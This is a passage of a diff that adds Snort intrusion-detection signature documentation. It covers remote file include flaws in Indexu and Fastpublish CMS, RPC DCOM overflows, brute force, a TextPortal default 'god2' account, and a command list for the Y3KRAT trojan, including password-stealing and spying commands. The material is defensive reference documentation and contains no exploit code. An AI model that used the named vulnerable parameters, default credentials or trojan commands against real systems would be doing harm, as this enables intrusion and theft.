+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000574.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000574
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_add.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_add.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2476.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2476
+
+--
+Summary:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings then create an entry in the winreg service.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
--- /dev/null
+++ b/doc/signatures/3407.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3407
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1948.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1948
+
+--
+Summary:
+A zone transfer of records on the DNS server has been requested.
+
+A successful zone transfer can give valuable reconnaissance about hostnames and IP addresses for the domain.
+
+--
+Impact:
+Information leak, reconnaissance.  A malicious user can gain valuable 
+information about the network.
+
+
+--
+Detailed Information:
+Zone transfers are normally used to replicate zone information between 
+master and slave DNS servers.  If zone transfers have not been 
+restricted to authorized slave servers only, malicious users can attempt
+them for reconnaissance about the network.  The content |00 00 FC| looks
+for the end of a DNS query and a DNS type of 252 meaning a DNS zone 
+transfer.
+
+--
+Affected Systems:
+All versions of BIND.
+
+--
+Attack Scenarios:
+A zone transfer might be a precursor to some kind of attack to gain 
+reconnaissance.
+
+--
+Ease of Attack:
+Simple to perform using tools such as nslookup, dig, and host.
+
+
+--
+False Positives:
+Legitimate zone transfers from authorized slave servers may cause this 
+False positives may arise from TSIG DNS traffic.  If all of your slave 
+servers are in your $HOME_NET and you do not support TSIG, the 
+likelihood of false positives should be very low.
+
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Configure your DNS servers to allow zone transfers from authorized hosts
+only.  
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+CAN-1999-0532
+arachnids,212
+
+
+--
--- /dev/null
+++ b/doc/signatures/3340.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3340
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000134.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 
+100000134
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Tcpdump. In particular, this event indicates that the exploit 
+was attempted via a malformed Resource Reservation Protocol (RSVP) packet.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS). Code execution may be possible.
+
+--
+Detailed Information:
+Tcpdump is a packet capture utility used on various BSD, Linux and UNIX style 
+operating systems.
+
+An error in the processing of the payload length in an RSVP packet may prevent 
+an attacker with the opportunity to overflow a fixed length buffer and execute 
+code of their choosing in the context of the user running tcpdump. This is 
+normally the super-user or administrator when tcpdump is used to sniff data 
+directly from a network interface.
+
+--
+Affected Systems:
+Tcpdump 3.9.1 and prior
+Ethereal 0.10.10 and prior
+
+--
+Attack Scenarios: 
+An attacker need to craft an RSVP packet with a packet payload length of 0 to 
+cause the overflow to manifest itself.
+
+-- 
+Ease of Attack: 
+Simple. Exploit code exists.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1638.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+1638
+
+--
+Summary:
+This event is generated when a scan for the version of an ssh daemon is
+detected.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host. In
+particular an attempt has been made to scan for the version of the ssh
+daemon on the target host.
+
+This may be the prelude to an attack. Scanners are used to ascertain
+which ports a host may be listening on, whether or not the ports are
+filtered by a firewall and if the host is vulnerable to a particular
+exploit.
+
+--
+Affected Systems:
+	Any host using the ssh daemon.
+
+--
+Attack Scenarios:
+An attacker can determine if a vulnerable version of ssh is being used
+on a host, then proceed to exploit that vulnerablity.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+If the scanning tool does not send an identification string this rule
+will not generate an event.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2710.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2710
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_load
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000363.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000363
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "search.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "search.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3451.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3451
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3082.txt
@@ -0,0 +1,145 @@
+Rule: 
+
+--
+Sid: 
+3082
+-- 
+Summary: 
+This event is generated when a Y3KRAT 1.5 client attempts to respond to the Y3KRAT 1.5 server.
+
+-- 
+Impact: 
+If connected, the attacker could execute a multitude of functions resulting in a complete compromise of the victim's machine.
+
+--
+Detailed Information:
+Y3KRAT 1.5 uses port 5880 by default. This port can be changed by the attacker. 
+
+The following is a list of the commands for many of Y3KRAT 1.5's functions (Command Name: Command String):
+
+AIM Passwords: aolpwd
+AIM Spy: aolspy
+Change Internet Explorer Caption: changeiecaptest
+Chat With Server: chatsrvY3K Rat user
+Clipboard: pastefromclip
+Change Desktop Color Scheme: clsys
+Change Recycle Bin Name: nrbin
+Change System Name: sysname
+Change Time: time
+Video List: getvideolist
+Dialup: autoconnect
+Access Directories: getclientgetpaths
+Get Directory Paths: getpaths
+Disable Mouse Buttons: dbuttons
+Disable Num Lock: dnumlock
+Disable System Keys: dsyskeys
+Disable All Keys: dkeys{all}
+DOS Commands: doscommands
+Fast Mouse: fastmouseon
+Find File: findfile
+Flip Screen: flip1hor
+FTP: openftp21
+Go To URL: gotourl
+Hide Taskbar: hidetask
+Hide Clock: hideclock
+Hide Desktop Icons: hidedeskicons
+Hide Start Button: hidestart
+Hide System Tray: hidesystray
+ICQ Information: getclienticqinfo
+ICQ Passwords: geticqpass
+ICQ Spy: icqspy
+Internet Explorer Spy: iespy
+General Information: general
+Lights On: lightson
+Lights Off: lightsoff
+Live Shot: cap
+Logged Passwords: getpasses
+Logoff: boot41
+Make File: makefile
+Matrix Chat: matrix
+Modify File (Read System File): readsysfiles
+Modify File (Write System File): writesysfiles
+Monitor Off: enablestandby
+Mouse Settings (Set Position): setpos
+Mouse Settings (Freeze Mouse Position): freezepos
+Mouse Settings (Speed Up Cursor): speedcursor
+MSN Spy: msnspy
+Napster Spy: napsterspy
+Net Get: netget
+NetStat (Read): netstatread
+NetStat (Kill): netstatkill
+CD-ROM open: cdopen
+CD-ROM close: cdclose
+Open File: getfiles
+Overclock: upmhz
+Play Sound: snd (*followed by the sound, for example, err for the error sound*)
+Power Off: boot31
+Print: print
+Ras Passwords: getras
+Remove Server: killserver
+Change Resolution: setdevmode
+Restart: boot21
+Safe Mode: safemode
+Screenshot: cap
+Send Keys: sendtextf
+Send Message: messText
+Show Windows With Text: showwin
+Shutdown: boot11
+Swap Mouse Buttons: swapbuttons
+Write System Error: writesystem
+Yahoo Spy: yahoospy
+
+
+--
+Affected Systems:
+	Windows 95, 98, ME, NT, 2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address and 
+presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+Remove the Dcomcnofg key located at the following places in the registry:
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\Run 
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\RunServices
+HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run
+
+Reboot the computer or close Dcomcnofg.exe.
+
+Delete Dcomcnofg.exe from the windows system directory.
+
+If found, delete server.exe and kill the process called server.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com> 
+
+-- 
+Additional References:
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/y3krat/15/index.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/2273.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2273
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to an
+IMAP server using brute force methods.
+
+--
+Impact:
+Attempted remote access.  
+This event may indicate that an attacker is attempting to guess username 
+and password combinations. Alternately, it may indicate that an authorized 
+user has entered an incorrect username and password combination a number 
+of times.
+
+--
+Detailed Information:
+An IMAP server will issue an error message after a failed login attempt.  
+This may be an indication of an attacker attempting brute force guessing 
+of username and password combinations.  It is also possible that an authorized 
+user has incorrectly entered a legitimate username and password combination.  
+
+This event will be generated after a number of failed attempts, in this
+case thirty attempted logins in thirty seconds.
+
+--
+Affected Systems:
+IMAP servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to guess username and password combinations.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This event may be triggered by a failed IMAP login attempt from a remote user.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Investigate the host for signs of compromise.
+
+Check mail logs for repeated failed attempts to login using 
+one or more usernames.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3084.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+3084
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the Veritas Back Exec Agent Browser.
+
+--
+Impact:
+Serious. Execution of arbitrary commands may be possible.
+
+--
+Detailed Information:
+
+The Veritas Backup Agent Browser is the server component of the Backup
+Exec software employed to provide a backup solution.  Client agents
+communicate with the Backup Agent Browser.  A registration request from
+a client that contains an overly long hostname value can cause a buffer
+overflow and the subsequent execution of arbitrary code on a vulnerable
+server.
+
+--
+Affected Systems:
+Veritas Software Backup Exec 8.0, 8.5, 8.6, 9.0, 9.1
+
+--
+Attack Scenarios:
+An attacker can craft a registration request that contains an overly
+long hostname, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current nonaffected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2148.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 2148
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the BLNews php application. 
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability in the BLNews PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL, the script is processed and executed with the privileges of the user running the webserver.
+
+--
+Affected Systems:
+Any host using BLNews.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7677
+
+--
--- /dev/null
+++ b/doc/signatures/1692.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1692
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2146.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid: 2146
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the php application TextPortal. 
+
+--
+Impact:
+Potential administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to supply a known default administrator password for the php application TextPortal.
+
+The default administrator account 'god2' has known, weak passwords that could be used by an attacker to gain unauthorized access to the application.
+
+
+--
+Affected Systems:
+Any host using TextPortal.
+
+--
+Attack Scenarios:
+An attacker can log in to the application using the account god2 and gain administrator access to the site.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Disable the god2 account.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7673
+
+--
--- /dev/null
+++ b/doc/signatures/3161.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3161
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2371.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2371
+
+--
+Summary:
+This event is generated when an attempt is made to access
+Sample_showcode.html, a component of the Niti Telecom Caravan Business
+Server.
+
+--
+Impact:
+Information disclosure. Possible directory traversal.
+
+--
+Detailed Information:
+Caravan Business Server is used to develop web applications. It is
+possible for an external user to perform a directory traversal attack
+against the server by maipulating the parameter fname in the
+Sample_showcode.html file.
+
+--
+Affected Systems:
+	Caravan Business Server 2.00/03D
+
+--
+Attack Scenarios:
+An attacker can view files on the system by performaing a directory
+traversal attack using the fname parameter in the Sample_showcode.html
+script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3238.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3238
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000115.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+100000115
+
+-- 
+Summary: 
+This event is generated when the PHP-Nuke program's Web_Links module is access 
+with a NULL value for the CID parameter.
+
+-- 
+
+Impact: 
+Sensitive path information may be disclosed, allowing an attacker to conduct 
+reconnaissance against the affected host.
+
+--
+Detailed Information:
+Queries made to PHP-Nuke's Web_Links module which omit the CID parameter, or 
+which leave its value blank, will generate an error that discloses sensitive 
+path information about the affected host.
+
+--
+Affected Systems:
+PHP-Nuke 6.0
+PHP-Nuke 6.5
+PHP-Nuke 6.5 RC1
+PHP-Nuke 6.5 RC2
+PHP-Nuke 6.5 RC3
+PHP-Nuke 6.5 BETA 1
+PHP-Nuke 6.5 FINAL
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser.
+-- 
+
+Ease of Attack: 
+Simple, as example exploit URIs exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+An unsupported fix exists at the URI referenced in the Additional References 
+section. No vendor-supplied patch or workaround exists.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.securityfocus.com/archive/1/321313
+
+--
--- /dev/null
+++ b/doc/signatures/1930.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1930
+
+--
+Summary:
+This event is generated when a remote attacker sends an overly long
